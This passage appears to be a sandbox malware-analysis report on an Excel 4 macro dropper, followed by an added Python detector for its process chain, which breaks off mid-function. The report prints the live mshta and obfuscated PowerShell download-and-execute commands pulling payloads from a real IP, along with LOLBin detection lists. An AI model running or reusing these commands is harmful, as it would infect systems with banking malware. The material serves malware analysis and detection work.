Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: mshta.exe, 00000004.00000002.438237108.000000000029C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421193159.000000000029C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436608606.000000000029C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com{ equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000002.438237108.000000000029C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421193159.000000000029C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436608606.000000000029C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 10_2_1001B43F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 12_2_1001B43F
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud

Source: Yara match File source: 12.2.rundll32.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.9c0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.31f0000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.3280000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2bd0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.28f0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.29a0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2fb0000.24.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.24b0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.3030000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.870000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2ba0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.9f0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.23f0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2d50000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2bd0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.29d0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.260000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3030000.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.23a0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.31f0000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.870000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.24b0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.30d0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2d50000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2f70000.23.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3240000.29.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.260000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2520000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2c60000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3030000.26.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2c90000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2370000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2fb0000.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2370000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2810000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2c90000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.760000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2e60000.21.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.730000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.30a0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.31c0000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.730000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2d20000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.29d0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.340000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2b0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2e30000.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.23a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.31d0000.28.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2f70000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2ad0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2aa0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.9c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.8a0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.410000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2f40000.22.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2de0000.19.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2f40000.22.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2de0000.19.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2ad0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2720000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3000000.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.720000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2810000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2330000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.3030000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.410000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.31a0000.27.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.30d0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.30.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.677067947.0000000002370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.453101619.0000000000150000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.678344656.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677431003.0000000002BD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509305754.0000000003030000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677169719.0000000002810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677889401.0000000003001000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509452651.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.676890629.00000000009C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677655437.0000000002E31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509112369.00000000023F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.508729235.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509093299.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.508905338.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.508777741.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.511827819.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.676823540.00000000008A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.676935914.00000000009F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.676642352.0000000000730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.512005602.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.678040246.00000000031D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677708619.0000000002E61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.676672140.0000000000761000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677290859.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677828983.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509149844.00000000024B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509175911.0000000002521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.678097225.0000000003241000.00000020.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677992922.00000000031A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509224243.00000000028F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677771933.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.453319982.0000000000211000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677797866.0000000002F70000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677404297.0000000002BA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677466682.0000000002C61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677573347.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677263877.00000000029A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509407171.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677492210.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509387202.00000000031C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.508826580.0000000000260000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677332473.0000000002AA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.508857582.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677359983.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.511919607.0000000000721000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509354773.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509069868.0000000002331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677545116.0000000002D21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509334125.00000000030A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677930195.0000000003030000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.508950592.0000000000410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.509428106.0000000003281000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.676771447.0000000000870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677128024.0000000002721000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.453573074.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.677606163.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\JooSee.dll, type: DROPPED

System Summary

Source: opastonline.com.xls Macro extractor: Sheet: LINKO contains: mshta
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
Source: Screenshot number: 4 Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 23 24 25 26 27 2
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 :: 19 20 21 22 U LI
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 , , Previewing is not available for protected documents. 14
Source: Screenshot number: 8 Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 :: 19 20 21 22 U LI 23 24 25 26 27
Source: opastonline.com.xls Stream path 'Workbook' : [binary BIFF workbook stream; non-printable bytes omitted. Readable fragments: user-name string "xXx", repeated font records for "Calibri" and "Calibri Light", and number-format strings such as `_-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-` and `_-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-`]
Source: opastonline.com.xls.0.dr Stream path 'Workbook' : [binary BIFF workbook stream; non-printable bytes omitted. Readable fragments: user-name string "user", repeated font records for "Calibri" and "Calibri Light", and number-format strings such as `_-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-` and `_-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-`]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll Jump to dropped file
Source: opastonline.com.xls Initial sample: EXEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10036007 10_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10041050 10_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1003130F 10_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_100323E2 10_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10030460 10_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_10041592 10_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_1003E59F 10_2_1003E59F
Source: 4885.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Source: opastonline.com.xls Macro extractor: Sheet name: LINKO
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write
Source: opastonline.com.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\opastonline.com.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Diftwn\ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
Source: opastonline.com.xls OLE indicator, VBA macros: true
Source: opastonline.com.xls.0.dr OLE indicator, VBA macros: true
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@18/13@5/48
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: opastonline.com.xls OLE indicator, Workbook stream: true
Source: opastonline.com.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc, 10_2_100125C0
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ten UTF-16 console-buffer writes, mostly non-printable; the last decodes to the prompt PS C:\Users\Albus\Documents> (note the profile name differs from the C:\Users\user paths shown elsewhere in this report) Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/cc/vv/fe.html
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Diftwn\pevlwp.arl",LdijUjelIhHUzGb
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Diftwn\pevlwp.arl",DllRegisterServer
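
The chain above (EXCEL.EXE -> cmd.exe -> mshta.exe -> powershell.exe -> cmd.exe -> rundll32.exe, then rundll32.exe re-launching itself on the module copied into SysWOW64\Diftwn\) is what the Sigma hits in the Signatures list ("Microsoft Office Product Spawning Windows Shell", "MSHTA Spawning Windows Shell", "Suspicious MSHTA Process Patterns") key on. Added example, not part of this Joe Sandbox report and not Sigma's own code: a Python checker that rebuilds the tree from Sysmon-style process-creation events and applies those parent/child and rundll32-module rules. The events are constructed from the "Process created" lines above; the PIDs are invented (the report shows none) and the PowerShell script argument is replaced by a placeholder so the line stays readable.

```python
import re
from collections import namedtuple

# Sysmon EID 1-style events reconstructed from this report's "Process created" lines.
# PIDs are constructed; parent/child links follow the order the report lists them.
Event = namedtuple("Event", "pid ppid image cmdline")
EVENTS = [
    Event(1, 0, r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
          r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding'),
    Event(2, 1, r"C:\Windows\System32\cmd.exe", r"CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html"),
    Event(3, 2, r"C:\Windows\System32\mshta.exe", r"mshta http://91.240.118.172/cc/vv/fe.html"),
    Event(4, 3, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit <script argument omitted in this constructed sample>'),
    Event(5, 4, r"C:\Windows\System32\cmd.exe",
          r'"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq'),
    Event(6, 5, r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq"),
    Event(7, 6, r"C:\Windows\SysWOW64\rundll32.exe", r'C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer'),
    Event(8, 7, r"C:\Windows\SysWOW64\rundll32.exe", r'C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Diftwn\pevlwp.arl",LdijUjelIhHUzGb'),
    Event(9, 8, r"C:\Windows\SysWOW64\rundll32.exe", r'C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Diftwn\pevlwp.arl",DllRegisterServer'),
    Event(10, 0, r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\svchost.exe -k WerSvcGroup"),  # unrelated noise
]

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"cmd.exe", "mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe",
           "rundll32.exe", "regsvr32.exe", "certutil.exe"}
USER_WRITABLE = ("c:\\programdata", "c:\\users\\", "c:\\windows\\temp")
# rundll32.exe <module> <export>  or  rundll32.exe "<module>",<export>
RUNDLL32_ARGS = re.compile(r'rundll32\.exe\s+"?([^",]+?)"?(?:\s*,\s*|\s+)(\w+)', re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(ev, by_pid):
    """Walk ppid links up to the root, guarding against cycles in malformed data."""
    seen, chain = set(), []
    while ev.ppid in by_pid and ev.ppid not in seen:
        seen.add(ev.ppid)
        ev = by_pid[ev.ppid]
        chain.append(ev)
    return chain


def rundll32_module(cmdline):
    """Return (module path, export name) rundll32 was asked to run, or (None, None)."""
    m = RUNDLL32_ARGS.search(cmdline)
    return (m.group(1), m.group(2)) if m else (None, None)


def suspicious_module(path):
    """Module loaded from a user-writable directory, or under a non-.dll extension."""
    low = path.lower()
    return (not low.endswith(".dll")) or low.startswith(USER_WRITABLE)


def evaluate(events):
    """Return the set of (pid, rule) pairs that fire over the given events."""
    by_pid = {e.pid: e for e in events}
    hits = set()
    for e in events:
        me = basename(e.image)
        parent = by_pid.get(e.ppid)
        pa = basename(parent.image) if parent else ""
        if pa in OFFICE and me in LOLBINS:
            hits.add((e.pid, "office_spawns_lolbin"))
        if pa == "mshta.exe" and me in {"cmd.exe", "powershell.exe"}:
            hits.add((e.pid, "mshta_spawns_shell"))
        if me == "mshta.exe" and re.search(r"https?://", e.cmdline, re.I):
            hits.add((e.pid, "mshta_remote_url"))
        if me == "rundll32.exe":
            module, _export = rundll32_module(e.cmdline)
            if module and suspicious_module(module):
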